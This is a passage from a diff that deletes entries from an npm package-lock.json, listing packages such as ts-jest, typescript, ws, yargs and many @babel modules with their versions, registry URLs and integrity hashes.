"sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.10.tgz", - "integrity": "sha512-UPYc3SauzZ3JGgj87GgZ89JVdC5dj0AoetR5Bw6wj4niittNyFh6+eOGonYvJ1ao6B8lEa3Q3klS7ADZ53bc5g==", - "dev": true, - "requires": { - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.10" - } - }, - "@babel/parser": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.10.tgz", - "integrity": "sha512-6aQR2zGE/QFi8JpDLjUZEPYOs7+mhKXm86VaKFiLP35JQwQb6bwUE+XbvkH0EptsYhbNBSUGaUBLKqxH1xSgsA==", - "dev": true, - "requires": { - "@babel/types": "^7.26.10" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.26.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", - "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.26.2", - "@babel/parser": "^7.26.9", - "@babel/types": "^7.26.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.10.tgz", - "integrity": "sha512-emqcG3vHrpxUKTrxcblR36dcrcoRDvKmnL/dCL6ZsHaShW80qxCAcNhzQZrpeM765VzEos+xOi4s+r4IXzTwdQ==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": 